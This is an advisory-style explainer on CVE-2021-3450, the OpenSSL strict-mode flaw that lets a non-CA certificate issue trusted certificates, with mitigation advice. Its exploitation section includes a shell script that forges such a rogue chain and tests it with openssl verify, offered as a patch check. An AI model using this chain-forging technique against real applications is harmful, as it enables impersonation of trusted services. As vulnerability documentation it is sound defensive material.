CVE-2021-3450: What You Need to Know

CVE-2021-3450 is a vulnerability in OpenSSL 1.1.1h through 1.1.1j. When an application verifies a certificate chain with the X509_V_FLAG_X509_STRICT flag set, a flaw in the strict-mode checks lets a chain that contains a non-CA certificate in an issuing position pass verification. This page covers the impact, the affected versions and the mitigation steps.

Understanding CVE-2021-3450

This section provides insights into the nature of the vulnerability and its impact.

What is CVE-2021-3450?

CVE-2021-3450 is a flaw in the additional certificate checks that OpenSSL performs when the X509_V_FLAG_X509_STRICT verification flag is set. Because of the flaw, the check that rejects non-CA certificates used as issuers can be bypassed in strict mode.

The Impact of CVE-2021-3450

A certificate that is not marked as a CA should never be accepted as the issuer of another certificate. With the flaw, a chain in which such a certificate signs a further certificate can be accepted by an affected application, so anyone holding the private key of an ordinary end-entity certificate could mint certificates that the application trusts. That undermines the guarantee a certificate chain is supposed to provide: that every issuing certificate in it was authorised to issue.

Technical Details of CVE-2021-3450

Here, we delve into the technical aspects of the CVE-2021-3450 vulnerability.

Vulnerability Description

OpenSSL 1.1.1h added a strict-mode check that rejects certificates in the chain carrying explicitly encoded elliptic-curve parameters. An implementation error in that check overwrote the result of the earlier check that confirms each issuing certificate in the chain is a valid CA certificate. As a result, a non-CA certificate that passed the EC-parameter check was accepted as an issuer, which is exactly what the CA check exists to prevent.

Affected Systems and Versions

OpenSSL 1.1.1h, 1.1.1i and 1.1.1j are affected; the flaw was introduced in 1.1.1h, so earlier 1.1.1 releases and the 1.0.2 series are not affected. OpenSSL 1.1.1k contains the fix, and users are advised to upgrade to 1.1.1k or later.

Exploitation Mechanism

For an application to be affected, two conditions must hold. First, it must explicitly set X509_V_FLAG_X509_STRICT; the flag is not set by default. Second, it must either not set a certificate purpose or, if it is a TLS client or server, override the default purpose, because the purpose check independently requires issuing certificates to be CAs and would reject the chain on its own. libssl's TLS clients and servers set a purpose by default, so only applications that deliberately clear or change it while enabling strict mode are exposed. No special network position is required: the attacker simply needs a certificate chain whose issuing certificate is not a CA, which anyone holding an ordinary end-entity certificate's private key can produce.
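As an added example (not code from the original page or from the OpenSSL project), the following POSIX shell script builds a constructed chain in which a non-CA end-entity certificate signs a further certificate, then runs `openssl verify` in the three configurations that matter here: without the strict flag, with `-x509_strict` and no purpose (the combination the advisory describes as affected, since `openssl verify` sets no purpose unless `-purpose` is given), and with `-x509_strict` plus `-purpose sslserver`. The file names, subject names and the inline config are assumptions made for the demo; it needs only the openssl command-line tool.

```shell
#!/bin/sh
# Added example, not from the original page or the OpenSSL project.
# Builds a constructed chain  Demo Root CA -> leaf.example (CA:FALSE) -> rogue.example
# and runs the verification configurations discussed in the text.
# Assumes the openssl CLI is installed; names and paths are arbitrary.
set -e

# Minimal config so the demo does not depend on the system openssl.cnf.
write_config() {
  cat > "$1" <<'EOF'
[ req ]
distinguished_name = dn
prompt = no
[ dn ]
CN = placeholder
[ ca_ext ]
basicConstraints = critical,CA:TRUE
keyUsage = critical,keyCertSign,cRLSign
subjectKeyIdentifier = hash
[ nonca_ext ]
basicConstraints = critical,CA:FALSE
keyUsage = critical,digitalSignature
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid
EOF
}

# Named-curve EC keys for every subject: the flawed 1.1.1h check inspected
# explicitly encoded EC parameters, and named curves pass that check cleanly.
newkey="-newkey ec -pkeyopt ec_paramgen_curve:prime256v1 -nodes"

# Create ca.pem, leaf.pem (issued by the CA, CA:FALSE) and end.pem
# (signed with leaf's key, i.e. by a non-CA) inside directory $1.
build_rogue_chain() {
  dir=$1
  write_config "$dir/ext.cnf"
  # Trust anchor: a genuine CA certificate.
  openssl req -x509 $newkey -keyout "$dir/ca.key" -out "$dir/ca.pem" \
    -subj "/CN=Demo Root CA" -days 2 -config "$dir/ext.cnf" -extensions ca_ext 2>/dev/null
  # Ordinary end-entity certificate issued by the CA.
  openssl req -new $newkey -keyout "$dir/leaf.key" -out "$dir/leaf.csr" \
    -subj "/CN=leaf.example" -config "$dir/ext.cnf" 2>/dev/null
  openssl x509 -req -in "$dir/leaf.csr" -CA "$dir/ca.pem" -CAkey "$dir/ca.key" \
    -CAcreateserial -days 2 -extfile "$dir/ext.cnf" -extensions nonca_ext \
    -out "$dir/leaf.pem" 2>/dev/null
  # The attack: the non-CA leaf key signs a further certificate.
  openssl req -new $newkey -keyout "$dir/end.key" -out "$dir/end.csr" \
    -subj "/CN=rogue.example" -config "$dir/ext.cnf" 2>/dev/null
  openssl x509 -req -in "$dir/end.csr" -CA "$dir/leaf.pem" -CAkey "$dir/leaf.key" \
    -CAcreateserial -days 2 -extfile "$dir/ext.cnf" -extensions nonca_ext \
    -out "$dir/end.pem" 2>/dev/null
}

# Verify rogue.example against the root with whatever extra flags are given.
# Returns openssl verify's exit status: 0 means the chain was accepted.
verify_chain() {
  dir=$1; shift
  openssl verify "$@" -CAfile "$dir/ca.pem" -untrusted "$dir/leaf.pem" "$dir/end.pem"
}

main() {
  work=$(mktemp -d)
  build_rogue_chain "$work"
  echo "== no strict flag (rejected on every version)"
  verify_chain "$work" || true
  echo "== -x509_strict, no purpose (the affected configuration on 1.1.1h-1.1.1j)"
  verify_chain "$work" -x509_strict || true
  echo "== -x509_strict with a purpose (rejected on every version)"
  verify_chain "$work" -x509_strict -purpose sslserver || true
  rm -rf "$work"
}

main
```

On OpenSSL 1.1.1k and later all three runs reject rogue.example (the base error is `invalid CA certificate`, X509_V_ERR_INVALID_CA, although a newer build may report another strict-mode failure first). On an unpatched 1.1.1h to 1.1.1j build the second run is the one that would accept the chain, so running the script against the OpenSSL build in use is a quick way to confirm it carries the fix. The third run is the purpose-bound form that is safe on every version.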

Mitigation and Prevention

This section outlines the steps to mitigate and prevent the exploitation of CVE-2021-3450.

Immediate Steps to Take

Upgrade to OpenSSL 1.1.1k or later; the fix is in 1.1.1k. Where an immediate upgrade is not possible, an application can stay out of the affected code path by pairing X509_V_FLAG_X509_STRICT with an explicit verification purpose (the purpose check rejects non-CA issuers on its own), or by not enabling the strict flag until the upgrade is done.

Long-Term Security Practices

Keep OpenSSL current, and when your own verification code enables X509_V_FLAG_X509_STRICT, also set an explicit purpose with X509_VERIFY_PARAM_set_purpose so that the CA status of issuing certificates is enforced by more than one check. Exercise chain verification with deliberately bad chains, such as one with a non-CA certificate in an issuing position, as part of the application's test suite so that a regression of this kind is caught early.

Patching and Updates

Regularly check for security advisories and updates from OpenSSL to stay informed about patches and enhancements.
